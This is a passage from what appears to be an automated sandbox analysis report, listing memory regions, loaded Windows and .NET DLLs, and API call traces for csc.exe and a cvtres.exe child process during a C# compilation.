0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 598 start_va = 0x1a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 599 start_va = 0xfa0000 end_va = 0x11aefff monitored = 0 entry_point = 0x116bb80 region_type = mapped_file name = "csc.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\csc.exe") Region: id = 600 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 
entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 601 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 602 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 603 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 604 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 605 start_va = 0x3a0000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 606 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 607 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 608 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 609 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 610 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = 
mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 611 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 612 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 613 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 614 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 615 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 616 start_va = 0x70790000 end_va = 0x707a3fff monitored = 0 entry_point = 0x7079ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 617 start_va = 0x6c2f0000 end_va = 0x6c39afff monitored = 0 entry_point = 0x6c385f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 618 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" 
(normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 619 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 620 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 621 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 622 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 623 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 624 start_va = 0x75fa0000 end_va = 0x75ff6fff monitored = 0 entry_point = 0x75fb9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 625 start_va = 0x76120000 end_va = 0x76124fff monitored = 0 entry_point = 0x76121438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 626 start_va = 0x570000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 627 start_va = 0x71990000 end_va = 0x71992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 
"api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 628 start_va = 0xc0000 end_va = 0x187fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 629 start_va = 0x3a0000 end_va = 0x3bcfff monitored = 0 entry_point = 0x3a1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 630 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 631 start_va = 0x3a0000 end_va = 0x3bcfff monitored = 0 entry_point = 0x3a1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 632 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 633 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 634 start_va = 0x570000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 635 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 636 start_va = 0x11b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 637 start_va = 0x190000 end_va = 0x190fff monitored = 1 
entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 638 start_va = 0x3a0000 end_va = 0x3a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 639 start_va = 0x3b0000 end_va = 0x3e2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\1033\\cscui.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\1033\\cscui.dll") Region: id = 640 start_va = 0x74d50000 end_va = 0x74d58fff monitored = 0 entry_point = 0x74d51220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 641 start_va = 0x3f0000 end_va = 0x44bfff monitored = 0 entry_point = 0x4135b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 642 start_va = 0x3f0000 end_va = 0x44bfff monitored = 0 entry_point = 0x4135b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 643 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 644 start_va = 0x3f0000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 645 start_va = 0x430000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 646 start_va = 0x69ef0000 end_va = 0x69f15fff monitored = 1 entry_point = 0x69f06bb0 region_type = mapped_file name = "alink.dll" filename = 
"\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\alink.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\alink.dll") Region: id = 647 start_va = 0x76a50000 end_va = 0x76a79fff monitored = 0 entry_point = 0x76a512fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 648 start_va = 0x6e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 649 start_va = 0x6fb70000 end_va = 0x6fbb9fff monitored = 1 entry_point = 0x6fb72e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 650 start_va = 0x6e0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 651 start_va = 0x8a0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 652 start_va = 0x680000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 653 start_va = 0x6c430000 end_va = 0x6c4bcfff monitored = 1 entry_point = 0x6c442860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 654 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 655 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = 
"\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 656 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 657 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 658 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 659 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 660 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 661 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 662 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 663 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" 
(normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 664 start_va = 0x6e0000 end_va = 0x71bfff monitored = 0 entry_point = 0x6e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 665 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 666 start_va = 0x8e0000 end_va = 0xbaefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 667 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 668 start_va = 0x1db0000 end_va = 0x231afff monitored = 1 entry_point = 0x2288b2a region_type = mapped_file name = "mscorlib.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorlib.dll") Region: id = 669 start_va = 0xbb0000 end_va = 0xf13fff monitored = 1 entry_point = 0xed6b8e region_type = mapped_file name = "system.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\System.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\system.dll") Region: id = 670 start_va = 0x1db0000 end_va = 0x24b6fff monitored = 1 entry_point = 0x23cf38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: 
"c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 671 start_va = 0x6e0000 end_va = 0x859fff monitored = 1 entry_point = 0x84008e region_type = mapped_file name = "system.core.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\System.Core.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\system.core.dll") Region: id = 672 start_va = 0x24c0000 end_va = 0x2a2afff monitored = 1 entry_point = 0x2998b2a region_type = mapped_file name = "mscorlib.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorlib.dll") Region: id = 673 start_va = 0xf20000 end_va = 0xf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 674 start_va = 0xf60000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 675 start_va = 0x2a30000 end_va = 0x2f9afff monitored = 1 entry_point = 0x2f08b2a region_type = mapped_file name = "mscorlib.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorlib.dll") Region: id = 676 start_va = 0x69ec0000 end_va = 0x69ee6fff monitored = 1 entry_point = 0x69eda900 region_type = mapped_file name = "mscorpehost.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorpehost.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorpehost.dll") Region: id = 677 start_va = 0x2a30000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 678 start_va = 0x2a70000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" 
Region: id = 721 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "res41e4.tmp" filename = "\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\RES41E4.tmp" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\res41e4.tmp") Thread: id = 23 os_tid = 0x884 [0093.092] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0093.092] _initialize_onexit_table (_Table=0x69f0ac64) returned 0 [0093.092] _initialize_onexit_table (_Table=0x69f0ac70) returned 0 [0093.092] RtlInitializeSListHead (in: ListHead=0x69f0ac80 | out: ListHead=0x69f0ac80) [0093.094] __vcrt_InitializeCriticalSectionEx () returned 0x1 [0093.094] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x71990000 [0093.094] GetProcAddress (hModule=0x71990000, lpProcName="InitializeConditionVariable") returned 0x77729981 [0093.094] GetProcAddress (hModule=0x71990000, lpProcName="SleepConditionVariableCS") returned 0x76073014 [0093.095] GetProcAddress (hModule=0x71990000, lpProcName="WakeAllConditionVariable") returned 0x776f45a5 [0093.095] RtlInitializeConditionVariable () returned 0x69f0a92c [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f06d40) returned 0 [0093.095] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09370) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09290) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09270) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09320) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f092c0) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f092a0) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f092e0) returned 0 [0093.095] _register_onexit_function (_Table=0x69f0ac64, 
_Function=0x69f09300) returned 0 [0093.096] GetProcessHeap () returned 0x470000 [0093.096] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09340) returned 0 [0093.096] RtlWakeAllConditionVariable () returned 0x0 [0093.096] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09350) returned 0 [0093.096] RtlWakeAllConditionVariable () returned 0x0 [0093.096] _register_onexit_function (_Table=0x69f0ac64, _Function=0x69f09360) returned 0 [0093.096] GetVersionExA (in: lpVersionInformation=0x39d9b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x39d9b8, dwMinorVersion=0x39d9c8, dwBuildNumber=0x39d9cc, dwPlatformId=0x39d9d0, szCSDVersion="ôsðid¬ði`\x93ðiÜÙ9") | out: lpVersionInformation=0x39d9b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.096] DisableThreadLibraryCalls (hLibModule=0x69ef0000) returned 0 [0093.096] CreateALink () returned 0x0 [0093.096] malloc (_Size=0x34) returned 0x492710 [0093.096] malloc (_Size=0x104) returned 0x4930a8 [0093.096] malloc (_Size=0x2) returned 0x489800 [0093.096] malloc (_Size=0x104) returned 0x4931b8 [0093.096] malloc (_Size=0x2) returned 0x489810 [0096.656] CoCreateGuid (in: pguid=0x39d82c | out: pguid=0x39d82c*(Data1=0x3aad49c9, Data2=0x4d51, Data3=0x44e2, Data4=([0]=0xaa, [1]=0x78, [2]=0x7b, [3]=0x9c, [4]=0x86, [5]=0x26, [6]=0x34, [7]=0x1e))) returned 0x0 [0096.870] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x39d8a0 | out: ppstm=0x39d8a0*=0x4a69f0) returned 0x0 [0096.873] IUnknown:AddRef (This=0x4a69f0) returned 0x2 [0096.874] IStream:RemoteSeek (in: This=0x4a69f0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0096.875] ISequentialStream:RemoteWrite (in: This=0x4a69f0, pv=0x506ae0*=0x42, cb=0x3ac, pcbWritten=0x39d71c | out: pcbWritten=0x39d71c*=0x3ac) returned 0x0 [0096.876] IUnknown:Release (This=0x4a69f0) returned 0x1 [0096.876] 
IStream:Stat (in: This=0x4a69f0, pstatstg=0x39d8b8, grfStatFlag=0x1 | out: pstatstg=0x39d8b8) returned 0x0 [0096.876] IStream:RemoteSeek (in: This=0x4a69f0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0096.876] ISequentialStream:RemoteRead (in: This=0x4a69f0, pv=0x506ae0, cb=0x3ad, pcbRead=0x39d89c | out: pv=0x506ae0*=0x42, pcbRead=0x39d89c*=0x3ac) returned 0x0 [0096.876] IUnknown:Release (This=0x4a69f0) returned 0x0 Process: id = "3" image_name = "cvtres.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\cvtres.exe" page_root = "0x7ef473e0" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x94" cmd_line = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\RES41E4.tmp\" \"c:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\CSCB0BF2A73E23E4DE8AAB47EB279B9D1D0.TMP\"" cur_dir = "C:\\Windows\\system32\\" os_username = "MYB7ZA2AF\\5AlR3U30D3" bitness = "32" os_groups = "MYB7ZA2AF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e73d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 679 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 680 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 681 start_va = 0x40000 end_va = 0x40fff monitored = 1 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 682 start_va = 0x60000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 683 start_va = 0x12f0000 end_va = 0x12fafff monitored = 0 entry_point = 0x12f50d0 region_type = mapped_file name = "cvtres.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\cvtres.exe") Region: id = 684 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 685 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 686 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 687 start_va = 0x7ffd4000 end_va = 0x7ffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 688 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 689 start_va = 0x160000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 690 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 691 start_va = 0x75ab0000 end_va = 0x75afafff monitored 
= 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 692 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 693 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 694 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 695 start_va = 0x160000 end_va = 0x1c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 696 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 697 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 698 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 699 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 700 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" 
